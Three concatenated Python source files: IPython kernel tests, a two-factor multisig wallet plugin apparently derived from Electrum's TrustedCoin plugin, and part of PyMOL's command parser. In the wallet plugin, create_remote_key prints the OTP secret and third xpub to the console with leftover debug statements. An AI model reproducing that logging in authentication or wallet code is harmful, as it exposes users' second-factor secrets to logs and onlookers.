test_kernel.py
|
"""test the IPython Kernel"""
#-------------------------------------------------------------------------------
# Copyright (C) 2013 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-------------------------------------------------------------------------------
#-------------------------------------------------------------------------------
# Imports
#-------------------------------------------------------------------------------
import sys
import nose.tools as nt
from IPython.testing import decorators as dec, tools as tt
from IPython.utils import py3compat
from .utils import new_kernel, kernel, TIMEOUT, assemble_output, execute, flush_channels
#-------------------------------------------------------------------------------
# Tests
#-------------------------------------------------------------------------------
def _check_mp_mode(kc, expected=False, stream="stdout"):
execute(kc=kc, code="import sys")
flush_channels(kc)
msg_id, content = execute(kc=kc, code="print (sys.%s._check_mp_mode())" % stream)
stdout, stderr = assemble_output(kc.iopub_channel)
nt.assert_equal(eval(stdout.strip()), expected)
# printing tests
def test_simple_print():
"""simple print statement in kernel"""
with kernel() as kc:
iopub = kc.iopub_channel
msg_id, content = execute(kc=kc, code="print ('hi')")
stdout, stderr = assemble_output(iopub)
nt.assert_equal(stdout, 'hi\n')
nt.assert_equal(stderr, '')
_check_mp_mode(kc, expected=False)
@dec.knownfailureif(sys.platform == 'win32', "subprocess prints fail on Windows")
def test_subprocess_print():
"""printing from forked mp.Process"""
with new_kernel() as kc:
iopub = kc.iopub_channel
_check_mp_mode(kc, expected=False)
flush_channels(kc)
np = 5
code = '\n'.join([
"from __future__ import print_function",
"import multiprocessing as mp",
"pool = [mp.Process(target=print, args=('hello', i,)) for i in range(%i)]" % np,
"for p in pool: p.start()",
"for p in pool: p.join()"
])
expected = '\n'.join([
"hello %s" % i for i in range(np)
]) + '\n'
msg_id, content = execute(kc=kc, code=code)
stdout, stderr = assemble_output(iopub)
nt.assert_equal(stdout.count("hello"), np, stdout)
for n in range(np):
nt.assert_equal(stdout.count(str(n)), 1, stdout)
nt.assert_equal(stderr, '')
_check_mp_mode(kc, expected=False)
_check_mp_mode(kc, expected=False, stream="stderr")
def test_subprocess_noprint():
"""mp.Process without print doesn't trigger iostream mp_mode"""
with kernel() as kc:
iopub = kc.iopub_channel
np = 5
code = '\n'.join([
"import multiprocessing as mp",
"pool = [mp.Process(target=range, args=(i,)) for i in range(%i)]" % np,
"for p in pool: p.start()",
"for p in pool: p.join()"
])
msg_id, content = execute(kc=kc, code=code)
stdout, stderr = assemble_output(iopub)
nt.assert_equal(stdout, '')
nt.assert_equal(stderr, '')
_check_mp_mode(kc, expected=False)
_check_mp_mode(kc, expected=False, stream="stderr")
@dec.knownfailureif(sys.platform == 'win32', "subprocess prints fail on Windows")
def test_subprocess_error():
"""error in mp.Process doesn't crash"""
with new_kernel() as kc:
iopub = kc.iopub_channel
code = '\n'.join([
"import multiprocessing as mp",
"p = mp.Process(target=int, args=('hi',))",
"p.start()",
"p.join()",
])
msg_id, content = execute(kc=kc, code=code)
stdout, stderr = assemble_output(iopub)
nt.assert_equal(stdout, '')
nt.assert_true("ValueError" in stderr, stderr)
_check_mp_mode(kc, expected=False)
_check_mp_mode(kc, expected=False, stream="stderr")
# raw_input tests
def test_raw_input():
"""test [raw_]input"""
with kernel() as kc:
iopub = kc.iopub_channel
input_f = "input" if py3compat.PY3 else "raw_input"
theprompt = "prompt> "
code = 'print({input_f}("{theprompt}"))'.format(**locals())
msg_id = kc.execute(code, allow_stdin=True)
msg = kc.get_stdin_msg(block=True, timeout=TIMEOUT)
nt.assert_equal(msg['header']['msg_type'], u'input_request')
content = msg['content']
nt.assert_equal(content['prompt'], theprompt)
text = "some text"
kc.input(text)
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
nt.assert_equal(reply['content']['status'], 'ok')
stdout, stderr = assemble_output(iopub)
nt.assert_equal(stdout, text + "\n")
@dec.skipif(py3compat.PY3)
def test_eval_input():
"""test input() on Python 2"""
with kernel() as kc:
iopub = kc.iopub_channel
input_f = "input" if py3compat.PY3 else "raw_input"
theprompt = "prompt> "
code = 'print(input("{theprompt}"))'.format(**locals())
msg_id = kc.execute(code, allow_stdin=True)
msg = kc.get_stdin_msg(block=True, timeout=TIMEOUT)
nt.assert_equal(msg['header']['msg_type'], u'input_request')
content = msg['content']
nt.assert_equal(content['prompt'], theprompt)
kc.input("1+1")
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
nt.assert_equal(reply['content']['status'], 'ok')
stdout, stderr = assemble_output(iopub)
nt.assert_equal(stdout, "2\n")
def test_help_output():
"""ipython kernel --help-all works"""
tt.help_all_output_test('kernel')
|
tc_plugins.py
|
from .tc_wallet import Wallet_TC
from .tc_requests import tc_requests
from .tools import ErrorConnectingServer, TrustedCoinException, get_user_id, make_billing_address, Decrypt
import socket
from electrum import keystore
from electrum.bitcoin import TYPE_ADDRESS
from electrum.base_wizard import BaseWizard
from electrum.plugin import BasePlugin, hook
from electrum.i18n import _
from electrum.mnemonic import is_any_tc_seed_type, Mnemonic, seed_type
from electrum.bip32 import BIP32Node, xpub_type
from electrum.storage import STO_EV_USER_PW
DISCLAIMER = [
_("Two-factor authentication is a service provided by TC. "
"To use it, you must have a separate device with Google Authenticator."),
_("This service uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. A small fee will be charged on each transaction that uses the "
"remote server."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
]
class TCPlugin(BasePlugin):
wallet_class = Wallet_TC
disclaimer_msg = DISCLAIMER
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.wallet_class.plugin = self
self.requesting = False
def is_available(self):
return True
def is_enabled(self):
return True
def can_user_disable(self):
return False
@hook
def tc_sign_wrapper(self, wallet, tx, on_success, on_failure):
if not isinstance(wallet, self.wallet_class):
return
if tx.is_complete():
return
if wallet.can_sign_without_server():
return
if not wallet.keystores['x3/'].get_tx_derivations(tx):
self.logger.info("twofactor: xpub3 not needed")
return
def wrapper(tx):
self.prompt_user_for_otp(wallet, tx, on_success, on_failure)
return wrapper
@hook
def get_tx_extra_fee(self, wallet, tx):
if type(wallet) != Wallet_TC:
return
for o in tx.outputs():
if o.type == TYPE_ADDRESS and wallet.is_billing_address(o.address):
return o.address, o.value
def finish_requesting(func):
def f(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
finally:
self.requesting = False
return f
@finish_requesting
def request_billing_info(self, wallet: 'Wallet_TC', *, suppress_connection_error=True):
if wallet.can_sign_without_server():
return
self.logger.info("request billing info")
try:
# todo wallet.get_user_id()[1] == short_id
# billing_info = tc_requests.get(wallet.get_user_id()[1])
# billing_info = {'billing_plan': 'electrum-per-tx-otp',
# 'billing_address': 'n3X7wpKn3GzyvxEsVV6LKz2fWQtgXQdzA2', 'network': 'testnet',
# 'tx_remaining': 20, 'billing_index': 1,
# 'billing_address_segwit': 'tb1q79dd94xk475vukt3h2d99gdsqgdk9cgaxzmlpz',
# 'price_per_tx': [[1, 50000], [20, 100000], [100, 250000]],
# 'id': '1e42f483163b15b696cb7021a586018beebc8c15f2f0c4db740095e27606d979'}
# parameters at the time of the first billing charge
# billing_info = {'billing_plan': 'electrum-per-tx-otp',
# 'billing_address': 'mhArEhjwVxfLoRNU1S3UVRRQSaTLTsPGF1', 'network': 'testnet',
# 'tx_remaining': 0, 'billing_index': 0,
# 'billing_address_segwit': 'tb1qzg3wqfy45j44vvaj0k0xkr7rc0l64xj9k2avmg',
# 'price_per_tx': [[1, 50000], [20, 100000], [100, 250000]],
# 'id': '64acb16fa4e8ad05520e73e1d599fda5dba83a8024796bb69bf9ea90a0b55293'}
server_address = wallet.storage.get('server_address')
billing_info = tc_requests.get_billing(server_address, wallet.get_user_id()[1])
except ErrorConnectingServer as e:
if suppress_connection_error:
self.logger.info(str(e))
return
raise
billing_index = billing_info['billing_index']
# add segwit billing address; this will be used for actual billing
billing_address = make_billing_address(wallet, billing_index, addr_type='segwit')
if billing_address != billing_info['billing_address_segwit']:
raise Exception(f'unexpected trustedcoin billing address: '
f'calculated {billing_address}, received {billing_info["billing_address_segwit"]}')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='segwit')
# also add legacy billing address; only used for detecting past payments in GUI
billing_address = make_billing_address(wallet, billing_index, addr_type='legacy')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='legacy')
wallet.billing_info = billing_info
wallet.price_per_tx = dict(billing_info['price_per_tx'])
wallet.price_per_tx.pop(1, None)
return True
def start_request_thread(self, wallet):
from threading import Thread
if self.requesting is False:
self.requesting = True
t = Thread(target=self.request_billing_info, args=(wallet,))
t.setDaemon(True)
t.start()
return t
def make_seed(self, seed_type):
if not is_any_tc_seed_type(seed_type):
raise Exception(f'unexpected seed type: {seed_type}')
return Mnemonic('english').make_seed(seed_type=seed_type, num_bits=128)
@hook
def do_clear(self, window):
window.wallet.is_billing = False
def show_disclaimer(self, wizard: BaseWizard):
"""
Disclaimer.
:param wizard:
:return:
"""
wizard.set_icon('tc.jpeg')
wizard.reset_stack()
wizard.confirm_dialog(title='Disclaimer', message='\n\n'.join(self.disclaimer_msg),
run_next=lambda x: wizard.run('choose_seed'))
@staticmethod
def is_valid_seed(seed):
t = seed_type(seed)
return is_any_tc_seed_type(t)
@hook
def get_action(self, storage):
if storage.get('wallet_type') != 'tc':
return
if not storage.get('x1/'):
# show the agreement (disclaimer)
return self, 'show_disclaimer'
if not storage.get('x2/'):
return self, 'show_disclaimer'
if not storage.get('x3/'):
return self, 'accept_terms_of_use'
def choose_seed(self, wizard):
"""
Choose a seed.
:param wizard:
:return:
"""
title = _('Create or restore')
message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
choices = [
('choose_seed_type', _('Create a new seed')),
('restore_wallet', _('I already have a seed')),
]
wizard.choice_dialog(title=title, message=message, choices=choices, run_next=wizard.run)
def choose_seed_type(self, wizard):
choices = [
('create_tc_segwit_seed', _('Segwit TC')),
# ('create_tc_seed', _('Legacy TC')),
]
wizard.choose_seed_type(choices=choices)
def create_tc_segwit_seed(self, wizard):
self.create_seed(wizard, 'tc_segwit')
def create_tc_seed(self, wizard):
self.create_seed(wizard, 'tc')
def create_seed(self, wizard, seed_type):
seed = self.make_seed(seed_type)
f = lambda x: wizard.request_passphrase(seed, x)
wizard.show_seed_dialog(run_next=f, seed_text=seed)
def create_keystore(self, wizard, seed, passphrase):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
# public keys needed to create the wallet
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xpub(xpub2)
wizard.request_password(run_next=lambda pw, encrypt: self.on_password(wizard, pw, encrypt, k1, k2))
# k1.update_password(None, '')
# wizard.data['x1/'] = k1.dump()
# wizard.data['x2/'] = k2.dump()
# wizard.pw_args = password, encrypt_storage, STO_EV_USER_PW
# self.go_online_dialog(wizard)
def on_password(self, wizard, password, encrypt_storage, k1, k2):
k1.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
wizard.pw_args = password, encrypt_storage, STO_EV_USER_PW
self.go_online_dialog(wizard)
@classmethod
def xkeys_from_seed(self, seed, passphrase):
t = seed_type(seed)
if not is_any_tc_seed_type(t):
raise Exception(f'unexpected seed type: {t}')
words = seed.split()
n = len(words)
if n >= 20:
# note: pre-2.7 2fa seeds were typically 24-25 words, however they
# could probabilistically be arbitrarily shorter due to a bug. (see #3611)
# the probability of it being < 20 words is about 2^(-(256+12-19*11)) = 2^(-59)
if passphrase != '':
raise Exception('old 2fa seed cannot have passphrase')
xprv1, xpub1 = self.get_xkeys(' '.join(words[0:12]), t, '', "m/")
xprv2, xpub2 = self.get_xkeys(' '.join(words[12:]), t, '', "m/")
elif not t == 'tc' or n == 12:
xprv1, xpub1 = self.get_xkeys(seed, t, passphrase, "m/0'/")
xprv2, xpub2 = self.get_xkeys(seed, t, passphrase, "m/1'/")
else:
raise Exception('unrecognized seed length: {} words'.format(n))
return xprv1, xpub1, xprv2, xpub2
@classmethod
def get_xkeys(self, seed, t, passphrase, derivation):
assert is_any_tc_seed_type(t)
xtype = 'standard' if t == 'tc' else 'p2wsh'
bip32_seed = Mnemonic.mnemonic_to_seed(seed, passphrase)
rootnode = BIP32Node.from_rootseed(bip32_seed, xtype=xtype)
child_node = rootnode.subkey_at_private_derivation(derivation)
return child_node.to_xprv(), child_node.to_xpub()
def create_remote_key(self, email, wizard):
"""
Create the wallet: request the remote (third) key from the server.
:param email:
:param wizard:
:return:
"""
xpub1 = wizard.data['x1/']['xpub']
xpub2 = wizard.data['x2/']['xpub']
server_address = wizard.data['server_address']
type_of_service = wizard.data['type_of_service']
# Generate third key deterministically.
long_user_id, short_id = get_user_id(wizard.data)
# secret must be sent by the server
try:
# create the wallet on the server
r = tc_requests.create(server_address, xpub1, xpub2, email, type_of_service)
except (socket.error, ErrorConnectingServer):
wizard.show_message('Server not reachable, aborting')
wizard.terminate()
return
except TrustedCoinException as e:
wizard.show_message(str(e))
return
if r is None:
otp_secret = None
else:
otp_secret = r.get('otp_secret')
otp_secret = otp_secret[-5:] + otp_secret[:-5]
print('=======otp_secret======', otp_secret)
if not otp_secret:
wizard.show_message(_('Error'))
return
xpub3 = r.get('sat_xpub')
xpub3 = xpub3[-5:] + xpub3[:-5]
print('=======xpub3======', xpub3)
self.request_otp_dialog(wizard, short_id, otp_secret, xpub3)
def check_otp(self, wizard, short_id, otp_secret, xpub3, otp, reset):
if otp:
self.do_auth(wizard, short_id, otp, xpub3)
elif reset:
wizard.opt_bip39 = False
wizard.opt_ext = True
f = lambda seed, is_bip39, is_ext: wizard.run('on_reset_seed', short_id, seed, is_ext, xpub3)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def do_auth(self, wizard, short_id, otp, xpub3):
try:
# verify the OTP
server_address = wizard.data['server_address']
tc_requests.auth(server_address, short_id, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
wizard.show_message(_(e.server_message))
# ask again for otp
self.request_otp_dialog(wizard, short_id, None, xpub3)
else:
wizard.show_message(str(e))
wizard.terminate()
except Exception as e:
wizard.show_message(str(e))
wizard.terminate()
else:
k3 = keystore.from_xpub(xpub3)
wizard.data['x3/'] = k3.dump()
wizard.data['use_trustedcoin'] = True
wizard.terminate()
def on_reset_seed(self, wizard, short_id, seed, is_ext, xpub3):
f = lambda passphrase: wizard.run('on_reset_auth', short_id, seed, passphrase, xpub3)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def restore_wallet(self, wizard):
wizard.opt_bip39 = False
wizard.opt_ext = True
f = lambda seed, is_bip39, is_ext: wizard.run('on_restore_seed', seed, is_ext)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_restore_seed(self, wizard, seed, is_ext):
f = lambda x: self.restore_choice(wizard, seed, x)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def restore_choice(self, wizard: BaseWizard, seed, passphrase):
wizard.set_icon('tc.jpeg')
wizard.reset_stack()
title = _('Restore 2FA wallet')
msg = ' '.join([
'You are going to restore a wallet protected with two-factor authentication.',
'Do you want to keep using two-factor authentication with this wallet,',
'or do you want to disable it, and have two master private keys in your wallet?'
])
choices = [('keep', 'Keep'), ('disable', 'Disable')]
f = lambda x: self.on_choice(wizard, seed, passphrase, x)
wizard.choice_dialog(choices=choices, message=msg, title=title, run_next=f)
def on_choice(self, wizard, seed, passphrase, x):
if x == 'disable':
f = lambda pw, encrypt: wizard.run('on_restore_pw', seed, passphrase, pw, encrypt)
wizard.request_password(run_next=f)
else:
self.create_keystore(wizard, seed, passphrase)
# def on_restore_pw(self, wizard, seed, passphrase, password, encrypt_storage):
# xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
# k1 = keystore.from_xprv(xprv1)
# k2 = keystore.from_xprv(xprv2)
# k1.add_seed(seed)
# k1.update_password(None, password)
# k2.update_password(None, password)
# wizard.data['x1/'] = k1.dump()
# wizard.data['x2/'] = k2.dump()
# long_user_id, short_id = get_user_id(wizard.data)
# xtype = xpub_type(xpub1)
# xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
# k3 = keystore.from_xpub(xpub3)
# wizard.data['x3/'] = k3.dump()
# wizard.pw_args = password, encrypt_storage, STO_EV_USER_PW
# wizard.terminate()
# def on_reset_auth(self, wizard, short_id, seed, passphrase, xpub3):
# # todo: forgotten OTP (reset flow)
# xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
# if (wizard.data['x1/']['xpub'] != xpub1 or
# wizard.data['x2/']['xpub'] != xpub2):
# wizard.show_message(_('Incorrect seed'))
# return
# r = server.get_challenge(short_id)
# challenge = r.get('challenge')
# message = 'TRUSTEDCOIN CHALLENGE: ' + challenge
#
# def f(xprv):
# rootnode = BIP32Node.from_xkey(xprv)
# key = rootnode.subkey_at_private_derivation((0, 0)).eckey
# sig = key.sign_message(message, True)
# return base64.b64encode(sig).decode()
#
# signatures = [f(x) for x in [xprv1, xprv2]]
# r = server.reset_auth(short_id, challenge, signatures)
# new_secret = r.get('otp_secret')
# if not new_secret:
# wizard.show_message(_('Request rejected by server'))
# return
# self.request_otp_dialog(wizard, short_id, new_secret, xpub3)
|
parsing.py
|
#A* -------------------------------------------------------------------
#B* This file contains source code for the PyMOL computer program
#C* Copyright (c) Schrodinger, LLC.
#D* -------------------------------------------------------------------
#E* It is unlawful to modify or remove this copyright notice.
#F* -------------------------------------------------------------------
#G* Please see the accompanying LICENSE file for further information.
#H* -------------------------------------------------------------------
#I* Additional authors of this source file include:
#-*
#-*
#-*
#Z* -------------------------------------------------------------------
# parser2.py
# An improved command parser for PyMOL, but still a terrible kludge
# PyMOL needs to migrate to a real parser soon!
# === Goals:
# 1. improved 1to1 mapping between pymol "cmd" API and command language
# 2. support for named arguments
# 3. support for calling arbitrary python functions via this mapping
# === Syntactic Examples
# * simple commands
# command
# * commands with arguments
#
# command value1
# command value1,value2
# command value1,value2,value3
# * commands with named arguments
#
# command argument1=value1
# command argument1=value1,argument2=value2,argument3=value3
# command argument3=value1,argument2=value2,argument1=value1
# * mixed...
#
# command value1,argument3=value3,arg
# * commands with legacy '=' support for first argument
#
# command string1=value1
# * which should map to
# command string1,value1
# * legacy '=' combined as above
#
# command string1=value1,value2
# command string1=value1,value2,value3,...
# command string1=value1,argument3=value3
# === Burdens placed on API functions...
#
# None. However, function must have real arguments for error checking.
#
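# === Illustrative mapping (a sketch added for clarity; not part of the original notes)
#
# Under STRICT checking, a typed command line such as
#
#     command value1, argument3=value3
#
# is tokenized by parse_arg() below and matched against the target function's
# signature by prepare_call(), reaching Python roughly as
#
#     command(value1, argument3=value3)
#
# LEGACY mode additionally rewrites "str1=val1" into the two positional values
# "str1, val1" whenever "str1" is not an actual argument name of the function.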
from __future__ import absolute_import
# Don't import __future__.print_function
if True:
import re
import sys
import threading
import types
import inspect
from . import colorprinting
class QuietException(BaseException):
pass
# constants for keyword modes
SIMPLE = 0 # original pymol parsing (deprecated)
MOVIE = 1 # ignore ";", treat entire line as a single command
RUN = 2 # run command
SPAWN = 3 # for spawn and fork commands
ABORT = 4 # terminates command script
PYTHON = 5 # pass entire line to python
EMBED = 6 # embedded data
PYTHON_BLOCK = 7 # embedded python block
SKIP = 8 # skipping commands
NO_CHECK = 10 # no error checking
STRICT = 11 # strict name->argument checking
SECURE = 12 # command not available in "secure" mode
LEGACY = 13 # support legacy construct str1=val1,... -> str1,val1,...
LITERAL = 20 # argument is to be treated as a literal string
LITERAL1 = 21 # one regular argument, followed by literal string
LITERAL2 = 22 # two regular arguments, followed by literal string
# key regular expressions
arg_name_re = re.compile(r"[A-Za-z0-9_]+\s*\=")
nester_char_re = re.compile(r"\(|\)|\[|\]")
nester_re = re.compile(r"[^,;]*[\(\[]")
arg_pre_nester_re = re.compile(r"([^,;\(\[]+)[\(\[]")
arg_post_nester_re = re.compile(r"[^,;\(\[]*")
arg_easy_nester_re = re.compile(r"\([^,]*\)|\[[^,]*\]")
arg_hard_nester_re = re.compile(r"\(.*\)|\[.*\]")
# NOTE: a triple-quoted string that itself contains a single quote (e.g. '''sdf'sdfs''') is not handled by the pattern below.
arg_value_re = re.compile(r"'''[^']*'''|'[^']*'|"+r'"[^"]*"|[^,;]+')
def trim_nester(st):
# utility routine, returns single instance of a nested string
# should be modified to handle quotes too
pc = 1
l = len(st)
c = 1
while c<l:
if st[c] in ('(','['):
pc = pc + 1
if st[c] in (')',']'):
pc = pc - 1
c = c + 1
if not pc:
break
if pc:
return None
return st[0:c]
def apply_arg(inp_arg,par=(),def_dict={}):
n_inp = len(inp_arg)
n_req = n_inp - len(def_dict)
result = []
inp_dict = {}
for a in inp_arg:
if a[0] != None:
inp_dict[a[0]] = a[1];
c = 0
for p in par:
if c<n_inp:
a = inp_arg[c]
if a[0] == None:
result.append(a[1])
c = c + 1
continue
if p in inp_dict:
result.append(inp_dict[p])
del inp_dict[p]
elif p in def_dict:
result.append(def_dict[p])
elif c<n_req:
raise QuietException("Error: invalid argument(s).")
c = c + 1
if len(inp_dict):
raise QuietException("Error: invalid argument(s).")
return result
def parse_arg(st,mode=STRICT,_self=None):
'''
parse_arg(st)
expects entire command to be passed in
returns list of tuples of strings: [(None,value),(name,value)...]
'''
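# Illustrative sketch (added; not from the original source): for an input such as
#     "color red, selection=name ca"
# the leading command word is stripped off and the remainder parses to roughly
#     [(None, 'red'), ('selection', 'name ca')]
# i.e. positional values come back as (None, value) and named ones as (name, value).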
result = []
# current character
cc = 0
a = st.split(None, 1)
if len(a) == 2:
st = a[1]
while 1:
if mode>=LITERAL: # LITERAL argument handling
if (mode-LITERAL)==len(result):
result.append((None, st[cc:].strip()))
return result
# clean whitespace
st = st.lstrip()
if st == '':
break
# read argument name, if any
mo = arg_name_re.match(st)
if mo:
nam = mo.group(0)[:-1].strip()
st = st[mo.end(0):].lstrip()
else:
nam = None
# is one or more nesters present?
skip_flag = 0
if nester_re.match(st[cc:]):
skip_flag = 1
nest_flag = 1
nest_str = ''
while nest_flag: # parse all the nesters
nest_flag = 0
# text before nester?
mo = arg_pre_nester_re.match(st[cc:])
if mo:
nest_str = nest_str + mo.group(1)
cc=cc+mo.end(1)
# special handling for nesters (selections, lists, tuples, etc.)
mo = arg_easy_nester_re.match(st[cc:]) # no internal commas
if mo:
cnt = len(nester_char_re.findall(mo.group(0)))
if cnt % 2 == 1: # make sure nesters are matched in count
mo = None
if mo:
nest_str = nest_str + mo.group(0)
cc=cc+mo.end(0)
# text after nester?
mo = arg_post_nester_re.match(st[cc:])
if mo:
post_nester = mo.group(0)
cc=cc+mo.end(0)
nest_str = nest_str + post_nester
nest_flag = 1 # one more cycle
else:
mo = arg_hard_nester_re.match(st[cc:])
if mo:
se = trim_nester(mo.group(0))
if se==None:
colorprinting.error("Error: "+st)
colorprinting.error("Error: "+" "*cc+"^ syntax error (type 1).")
raise QuietException
else:
cc = cc + len(se)
nest_str = nest_str + se
# text after nester?
mo = arg_post_nester_re.match(st[cc:])
if mo:
nest_str = nest_str + mo.group(0)
cc=cc+mo.end(0)
nest_flag = 1 # one more cycle
if not len(nest_str): # we must have failed to parse...
skip_flag = 0
else:
result.append((nam, nest_str.strip()))
if not skip_flag:
# no nester, so just read normal argument value
argval = None
mo = arg_value_re.match(st[cc:])
if not mo:
if(st[cc:cc+1]!=','):
colorprinting.error("Error: "+st)
colorprinting.error("Error: "+" "*cc+"^ syntax error (type 2).")
raise QuietException
else:
# allow blank arguments
result.append((nam,None))
else:
argval = mo.group(0)
cc=cc+mo.end(0)
while 1: # pick up unquoted characters after the quotes
mo = arg_value_re.match(st[cc:])
if not mo:
break
argval = argval + mo.group(0)
cc=cc+mo.end(0)
if argval!=None:
result.append((nam, argval.strip()))
# clean whitespace
st = st[cc:].lstrip()
cc = 0
# skip over comma
if st != '':
if st.startswith(','):
st = st[1:].lstrip()
else:
colorprinting.error("Error: "+st)
colorprinting.error("Error: "+" "*cc+"^ syntax error (type 3).")
raise QuietException
if __name__!='__main__':
if _self._feedback(_self.fb_module.parser, _self.fb_mask.debugging):
_self.fb_debug.write(" parsing-DEBUG: tup: "+str(result)+"\n")
return result
def dump_str_list(list):
lst = list_to_str_list(list)
for a in lst:
print(a)
def list_to_str_list(list,width=77,margin=2): # format strings into a list
result = []
ll=len(list)
if ll>0:
mxln = 1
for a in list:
if len(a)>mxln:
mxln = len(a)
n_col = width//mxln
width = width - margin
while (n_col * mxln + n_col*2)>width:
n_col = n_col - 1
if n_col < 1:
n_col = 1
ll = len(list)
n_row = len(list)//n_col
while (n_row*n_col)<ll:
n_row = n_row + 1
rows = []
for a in range(n_row):
rows.append([])
row = 0
pad_list = []
for a in list:
pad_list.append(("%-"+str(mxln)+"s")%a)
for a in pad_list:
rows[row].append(a)
row = row + 1
if row >= n_row:
row = 0
for a in rows:
st = margin*' '
row = 0
st = st + ' '.join(a)
result.append(st)
return result
def dump_arg(name,arg_lst,nreq):
ac = 0
pc = 0
st = "Usage: "+name
if '_self' in arg_lst:
arg_lst = list(arg_lst)
arg_lst.remove('_self')
for a in arg_lst:
if ac>=nreq:
st = st + " ["
pc = pc + 1
if ac:
st = st + ", " + a
else:
st = st + " " + a
ac = ac + 1
print(st + " " + "]"*pc)
def prepare_call(fn,lst,mode=STRICT,name=None,_self=None): # returns tuple of arg,kw or excepts if error
if name==None:
name=fn.__name__
result = (None,None)
arg = []
kw = {}
co = fn.__code__
if (co.co_flags & 0xC): # disable error checking for *arg or **kw functions
mode = NO_CHECK
offset = 1 if inspect.ismethod(fn) else 0
arg_nam = co.co_varnames[offset:co.co_argcount]
narg = len(arg_nam)
if fn.__defaults__:
ndef = len(fn.__defaults__)
else:
ndef = 0
nreq = narg-ndef
if len(lst)==1:
if lst[0]==(None,'?'):
dump_arg(name,arg_nam,nreq)
raise QuietException
if mode==NO_CHECK:
# no error checking
for a in lst:
if a[0]==None:
arg.append(a[1])
else:
kw[a[0]]=a[1]
# set feedback argument (quiet), if extant, results enabled, and not overridden
if "quiet" in arg_nam:
if "quiet" not in kw:
if __name__!='__main__':
if _self._feedback(_self.fb_module.cmd, _self.fb_mask.results):
kw["quiet"] = 0
if "_self" not in kw: # always send _self in the dictionary
kw["_self"]=_self
else:
# error checking enabled
# build name dictionary, with required flag
arg_dct={}
c = 0
for a in arg_nam:
arg_dct[a]=c<nreq
c = c + 1
if mode==LEGACY:
# handle legacy string=value transformation
tmp_lst = []
for a in lst:
if(a[0]!=None):
if a[0] not in arg_dct:
tmp_lst.extend([(None,a[0]),(None,a[1])])
else:
tmp_lst.append(a)
else:
tmp_lst.append(a)
lst = tmp_lst
# make sure we don't have too many arguments
if len(lst)>narg:
if not narg:
colorprinting.error("Error: too many arguments for %s; None expected."%(name))
elif narg==nreq:
colorprinting.error("Error: too many arguments for %s; %d expected, %d found."%(
name,nreq,len(lst)))
dump_arg(name,arg_nam,nreq)
else:
colorprinting.error("Error: too many arguments for %s; %d to %d expected, %d found."%(
name,nreq,narg,len(lst)))
dump_arg(name,arg_nam,nreq)
raise QuietException
# match names to unnamed arguments to create argument dictionary
ac = 0
val_dct = {}
for a in lst:
if a[0]==None:
if ac>=narg:
raise QuietException("Parsing-Error: ambiguous argument: '"+str(a[1])+"'")
else:
val_dct[arg_nam[ac]]=a[1]
else:
val_dct[a[0]]=a[1]
ac = ac + 1
# now check to make sure we don't have any missing arguments
for a in arg_nam:
if arg_dct[a]:
if a not in val_dct:
raise QuietException("Parsing-Error: missing required argument in function %s : %s" % (name, a))
# return all arguments as keyword arguments
kw = val_dct
# set feedback argument (quiet), if extant, results enabled, and not overridden
if "quiet" in arg_dct:
if "quiet" not in kw:
if _self._feedback(_self.fb_module.cmd, _self.fb_mask.results):
kw["quiet"] = 0
# make sure command knows which PyMOL instance to message
if "_self" in arg_nam:
if "_self" not in kw:
kw["_self"]=_self
if __name__!='__main__':
if _self._feedback(_self.fb_module.parser, _self.fb_mask.debugging):
_self.fb_debug.write(" parsing-DEBUG: kw: "+str(kw)+"\n")
return (arg,kw)
# launching routines
def run(filename, namespace='global', _spawn=0, _self=None):
'''
DESCRIPTION
"run" executes an external Python script in a local name space,
the main Python namespace, the global PyMOL namespace, or in its
own namespace (as a module).
USAGE
run file [, namespace ]
ARGUMENTS
file = string: a Python program, typically ending in .py or .pym.
namespace = local, global, module, main, or private {default: global}
NOTES
Due to an idiosyncrasy in Pickle, you cannot pickle objects
directly created at the main level in a script run as "module",
(because the pickled object becomes dependent on that module).
Workaround: delegate construction to an imported module.
SEE ALSO
spawn
'''
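# Illustrative usage (hypothetical script name), as typed at the PyMOL prompt:
#     run my_script.py
#     run my_script.py, namespace=module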
from __main__ import __dict__ as ns_main
from pymol import __dict__ as ns_pymol
if not _self:
from pymol import cmd as _self
if filename.endswith('.pml'):
return _self.load(filename)
path = _self.exp_path(filename)
spawn = int(_spawn)
run_ = spawn_file if spawn else run_file
if namespace == 'global':
run_(path, ns_pymol, ns_pymol)
elif namespace == 'local':
run_(path, ns_pymol, {})
elif namespace == 'main':
run_(path, ns_main, ns_main)
elif namespace == 'private':
run_(path, ns_main, {})
elif namespace == 'module':
run_file_as_module(path, spawn=spawn)
else:
raise ValueError('invalid namespace "%s"' % namespace)
def spawn(filename, namespace='module', _self=None):
'''
DESCRIPTION
"spawn" launches a Python script in a new thread which will run
concurrently with the PyMOL interpreter. It can be run in its own
namespace (like a Python module, default), a local name space, or
in the global namespace.
USAGE
spawn file [, namespace ]
NOTES
The default namespace for spawn is "module".
The best way to spawn processes at startup is to use the -l option
(see "help launching").
SEE ALSO
run
'''
return run(filename, namespace, 1, _self)
def _print_exc():
colorprinting.print_exc([__file__])
def execfile(filename, global_ns, local_ns):
import pymol.internal as pi
